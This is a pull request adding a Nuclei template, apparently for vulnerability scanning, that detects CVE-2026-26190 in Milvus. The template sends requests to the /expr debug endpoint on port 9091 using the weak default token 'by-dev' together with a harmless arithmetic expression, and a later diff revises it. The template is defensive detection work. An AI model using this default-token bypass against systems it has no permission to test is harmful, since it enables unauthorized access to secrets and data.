### PR TITLE
CVE-2026-26190 (Milvus - Unauthenticated Metrics Port API Access)

### DIFF
--- a/http/cves/2026/CVE-2026-26190.yaml
+++ b/http/cves/2026/CVE-2026-26190.yaml
@@ -1,22 +1,15 @@
 id: CVE-2026-26190
 
 info:
-  name: Milvus <2.5.27, 2.6.0-2.6.9 - Unauthenticated Metrics Port (9091) API Access
+  name: Milvus - Unauthenticated Metrics API Access
   author: WRG-11
   severity: critical
   description: |
-    Milvus exposes its metrics/management HTTP server on TCP port 9091 without authentication.
-    The `/expr` debug endpoint authorizes requests with a weak, predictable default token
-    (`by-dev`, the default `etcd.rootPath`) and evaluates arbitrary internal expressions, while
-    the full `/api/v1/*` REST surface is registered on the same port with no authentication.
-    This enables unauthenticated secret/credential disclosure, data and user manipulation, and
-    arbitrary file write (potential RCE).
+    Milvus < 2.5.27 and < 2.6.10 contains an authentication bypass caused by weak default token and unauthenticated REST API on TCP port 9091, letting attackers perform arbitrary expression evaluation and data manipulation, exploit requires network access to port 9091.
   impact: |
-    An unauthenticated attacker able to reach port 9091 can evaluate arbitrary expressions to
-    leak MinIO/etcd secrets and credential hashes, manipulate collections and user credentials,
-    or write arbitrary files on the server.
+    Attackers can bypass authentication to execute arbitrary expressions and manipulate data, risking full system compromise.
   remediation: |
-    Upgrade to Milvus 2.5.27 / 2.6.10 or later and restrict network access to port 9091.
+    Update to versions 2.5.27 or 2.6.10 or later.
   reference:
     - https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6
     - https://github.com/advisories/GHSA-7ppg-37fh-vcr6
@@ -32,17 +25,19 @@ info:
     vendor: milvus
     product: milvus
     shodan-query: 'http.html:"404 page not found" port:"9091"'
-  tags: cve,cve2026,milvus,auth-bypass,exposure,unauthenticated,vector-database
+  tags: cve,cve2026,milvus,auth-bypass,unauth
+
+variables:
+  num1: "{{rand_int(40000, 44800)}}"
+  num2: "{{rand_int(40000, 44800)}}"
+  result: "{{to_number(num1)*to_number(num2)}}"
 
 flow: http(1) && http(2)
 
 http:
-  # Request 1 (baseline / negative control): a random wrong token MUST be rejected,
-  # proving /expr actually enforces auth -- so the match in request 2 is the weak
-  # DEFAULT-token bypass, not a generally open endpoint or an unrelated service.
   - raw:
       - |
-        GET /expr?auth={{randstr}}&code=1337%2B31337 HTTP/1.1
+        GET /expr?auth={{randstr}}&code={{num1}}*{{num2}} HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
@@ -52,12 +47,9 @@ http:
           - 'the expr auth is invalid'
         internal: true
 
-  # Request 2 (exploit): the weak default token `by-dev` is accepted and evaluates a
-  # benign arithmetic expression, returning the exact computed sum (1337+31337=32674).
-  # Non-destructive -- no data is read or modified.
   - raw:
       - |
-        GET /expr?auth=by-dev&code=1337%2B31337 HTTP/1.1
+        GET /expr?auth=by-dev&code={{num1}}*{{num2}} HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and
@@ -65,7 +57,7 @@ http:
       - type: word
         part: body
         words:
-          - '"output":"32674"'
+          - '"output":"{{result}}"'
 
       - type: status
         status:

--- a/http/cves/2026/CVE-2026-26190.yaml
+++ b/http/cves/2026/CVE-2026-26190.yaml
@@ -1,0 +1,72 @@
+id: CVE-2026-26190
+
+info:
+  name: Milvus <2.5.27, 2.6.0-2.6.9 - Unauthenticated Metrics Port (9091) API Access
+  author: WRG-11
+  severity: critical
+  description: |
+    Milvus exposes its metrics/management HTTP server on TCP port 9091 without authentication.
+    The `/expr` debug endpoint authorizes requests with a weak, predictable default token
+    (`by-dev`, the default `etcd.rootPath`) and evaluates arbitrary internal expressions, while
+    the full `/api/v1/*` REST surface is registered on the same port with no authentication.
+    This enables unauthenticated secret/credential disclosure, data and user manipulation, and
+    arbitrary file write (potential RCE).
+  impact: |
+    An unauthenticated attacker able to reach port 9091 can evaluate arbitrary expressions to
+    leak MinIO/etcd secrets and credential hashes, manipulate collections and user credentials,
+    or write arbitrary files on the server.
+  remediation: |
+    Upgrade to Milvus 2.5.27 / 2.6.10 or later and restrict network access to port 9091.
+  reference:
+    - https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6
+    - https://github.com/advisories/GHSA-7ppg-37fh-vcr6
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-26190
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-26190
+    cwe-id: CWE-306
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: milvus
+    product: milvus
+    shodan-query: 'http.html:"404 page not found" port:"9091"'
+  tags: cve,cve2026,milvus,auth-bypass,exposure,unauthenticated,vector-database
+
+flow: http(1) && http(2)
+
+http:
+  # Request 1 (baseline / negative control): a random wrong token MUST be rejected,
+  # proving /expr actually enforces auth -- so the match in request 2 is the weak
+  # DEFAULT-token bypass, not a generally open endpoint or an unrelated service.
+  - raw:
+      - |
+        GET /expr?auth={{randstr}}&code=1337%2B31337 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'the expr auth is invalid'
+        internal: true
+
+  # Request 2 (exploit): the weak default token `by-dev` is accepted and evaluates a
+  # benign arithmetic expression, returning the exact computed sum (1337+31337=32674).
+  # Non-destructive -- no data is read or modified.
+  - raw:
+      - |
+        GET /expr?auth=by-dev&code=1337%2B31337 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"output":"32674"'
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
**Template:** `http/cves/2026/CVE-2026-26190.yaml`

### What it detects
Milvus (`< 2.5.27` and `2.6.0`–`2.6.9`) exposes its metrics/management HTTP server on port 9091 without authentication. The `/expr` debug endpoint accepts a weak, predictable default token (`by-dev`, the default `etcd.rootPath`) and evaluates arbitrary internal expressions, leading to unauthenticated secret/credential disclosure, data manipulation, and arbitrary file write. (GHSA-7ppg-37fh-vcr6, CVSS 9.8)

### Detection approach (non-destructive)
Two-request `flow`:
1. **Baseline** — a random `auth` token is rejected (`the expr auth is invalid`), proving `/expr` enforces auth, so the match is the weak **default**-token bypass rather than a generally open endpoint or an unrelated service.
2. **Exploit** — the default `by-dev` token is accepted and evaluates a benign arithmetic expression (`1337+31337`), returning the exact computed sum. No data is read or modified.

### Testing
- Vulnerable `milvusdb/milvus:v2.5.10` → match (critical).
- Patched `milvusdb/milvus:v2.5.27` → no match (the patch disables `/expr` by default, so the baseline request no longer returns the auth-error string and request 2 never runs).
- `nuclei -validate` passes.

### References
- https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6
- https://nvd.nist.gov/vuln/detail/CVE-2026-26190
